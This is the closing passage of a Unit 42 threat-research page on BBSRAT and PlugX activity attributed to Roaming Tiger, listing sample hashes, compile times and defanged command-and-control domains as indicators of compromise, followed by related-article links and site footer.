| MD5              | B934BF027EC3A9DFCAE9D836D68BAB75                                 |
| SHA1             | E9744516E621B233C44F5854C0DF63FFDD62FB81                         |
| SHA256           | 0BAF36CA2D3772FDFF989E2B7E762829D30DB132757340725BB50DEE3B51850C |
| Compile Time     | 2014-12-26 17:17:00 UTC                                          |
| Network Protocol | HTTPS                                                            |
| C2 Server(s)     | transactiona\[.\]com  financenewsru\[.\]net                |

|------------------|-------------------------------------------------------------------------------|
| MD5              | 7533E65A16B4B3BA451A141F389D3A30                                              |
| SHA1             | CB46E6234DA0A9C859C1F71FFEB86100284A0142                                      |
| SHA256           | D579255852720D794349AE2238F084C6393419AF38479F3D0E3D2A21C9EB8E18              |
| Compile Time     | 2014-12-26 17:17:00 UTC                                                       |
| Network Protocol | HTTPS                                                                         |
| C2 Server(s)     | winwordupdate\[.\]dynu\[.\]com  adobeflashupdate1\[.\]strangled\[.\]net |

|------------------|------------------------------------------------------------------|
| MD5              | 8CD233D3F226CB1BF6BF15ACA52E0E36                                 |
| SHA1             | B955CA4AA8F7181C2252C4699718F6FEFC0B9CE3                         |
| SHA256           | 95F198ED29CF3F7D4DDD7CF688BFEC9E39D92B78C0A1FD2288E13A92459BDB35 |
| Compile Time     | 2015-09-22 06:16:44 UTC                                          |
| Network Protocol | HTTP                                                             |
| C2 Server(s)     | www\[.\]testzake\[.\]com                                         |

#### PowerSploit Downloader

|------------------|------------------------------------------------------------------|
| MD5              | 0AA391DC6D9EBEC2F5D0EE6B4A4BA1FA                                 |
| SHA1             | D238C157F87204D03C9005AF9A9CBC28C108E50A                         |
| SHA256           | 71DC584564B726ED2E6B1423785037BFB178184419F3C878E02C7DA8BA87C64D |
| Compile Time     | 2015-09-21 11:59:18 UTC                                          |
| Network Protocol | HTTP                                                             |
| C2 Server(s)     | www\[.\]testzake\[.\]com                                         |

### IOCs

#### Hashes

61a692e615e31b97b47a215479e6347fbd8e6e33d7c9d044766b4c1d1ae1b1fb  
22592a32b1193587a707d8b20c04d966fe61b37f7def7613d9bb91ff2fe9b13b  
2d81d65d09bf1b864d8964627e13515cee7deddfbd0dc70b1e67f123ab91421e  
d579255852720d794349ae2238f084c6393419af38479f3d0e3d2a21c9eb8e18  
0fc52c74dd54a97459e964b340d694d8433a3229f61e1c305477f8c56c538f27  
567a5b54d6c153cdd2ddd2b084f1f66fc87587dd691cd2ba8e30d689328a673f  
95f198ed29cf3f7d4ddd7cf688bfec9e39d92b78c0a1fd2288e13a92459bdb35  
6fae5305907ce99f9ab51e720232ef5acf1950826db520a847bf8892dc9578de  
b1737f3a1c50cb39cd9938d5ec3b4a6a10b711f17e917886481c38967b93e259  
71dc584564b726ed2e6b1423785037bfb178184419f3c878e02c7da8ba87c64d  
4ea23449786b655c495edf258293ac446f2216464b3d1bccb314ef4c61861101  
0baf36ca2d3772fdff989e2b7e762829d30db132757340725bb50dee3b51850c  
012ec51657d8724338a76574a39db4849579050f02c0103d46d406079afa1e8b  
e049bd90028a56b286f4b0b9062a8df2ab2ddf492764e3962f295e9ce33660e3  
77a2e26097285a794e42c9e813d14936d0e7a1dd3504205dd6b28a71626f8c3c  
5aa7db3344aa76211bbda3eaaccf1fc1b2e76df97ff9c30e7509701a389bd397  
fc4b465ee8d2053e9e41fb0a6ae32843e4e23145845967a069e584f582279725  
44171afafca54129b89a0026006eca03d5307d79a301e4a8a712f796a3fdec6e  
7438ed5f0fbe4b26afed2fe0e4e4531fc129a44d8ea416f12a77d0c0cd873520  
13d0bd83a023712b54c1dd391dfc1bc27b22d9df4fe3942e2967ec82d7c95640

#### Domains

adobeflashupdate.dynu\[.\]com  
adobeflashupdate1.strangled\[.\]net  
cdaklle.housejjk\[.\]com  
futuresgolda\[.\]com  
herman.eergh\[.\]com  
jowwln.cocolco\[.\]com  
kop.gupdiic\[.\]com  
loomon.gupdiicc\[.\]com  
pagbine.ofhloe\[.\]com  
panaba.empleoy-plan\[.\]com  
peak.measurepeak\[.\]com  
prdaio.unbrtel\[.\]com  
support.yandexmailru\[.\]kr  
systemupdate5.dtdns\[.\]net  
testzake\[.\]com  
transactiona\[.\]com  
wap.gxqtc\[.\]com  
wap.hbwla\[.\]com  
wap.kylxt\[.\]com  
windowsupdate.dyn\[.\]nu  
winwordupdate.dynu\[.\]com  
www.testzake\[.\]com  
www.yunw\[.\]top

Back to top

### Tags

* [BBSRAT](https://unit42.paloaltonetworks.com/tag/bbsrat/ "BBSRAT")
* [Microsoft Office](https://unit42.paloaltonetworks.com/tag/microsoft-office/ "Microsoft Office")
* [PlugX](https://unit42.paloaltonetworks.com/tag/plugx/ "PlugX")
* [Roaming Tiger](https://unit42.paloaltonetworks.com/tag/roaming-tiger/ "Roaming Tiger")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: #PANWchat Wrap-Up: The 2016 Threat Landscape](https://unit42.paloaltonetworks.com/panwchat-wrap-up-the-2016-threat-landscape/ "#PANWchat Wrap-Up: The 2016 Threat Landscape")

### Related Articles

* [CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia](https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/ "article - table of contents")
* [Intruders in the Library: Exploring DLL Hijacking](https://unit42.paloaltonetworks.com/dll-hijacking-techniques/ "article - table of contents")
* [In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584](https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of a magnifying glass illuminating a glowing orange circular digital circuit interface on a dark, high-tech background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Myth-Busting_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) September 16, 2026 [#### Atomic macOS (AMOS) Stealer Activity](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/)

* [MacOS](https://unit42.paloaltonetworks.com/tag/macos/ "macOS")

* [Threat intelligence](https://unit42.paloaltonetworks.com/tag/threat-intelligence/ "threat intelligence")

* [Unit 42](https://unit42.paloaltonetworks.com/tag/unit-42/ "Unit 42")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/ "Atomic macOS (AMOS) Stealer Activity")  
  ![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/unit42/respond/managed-detection-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/prepare-for-emerging-risks/continuous-frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
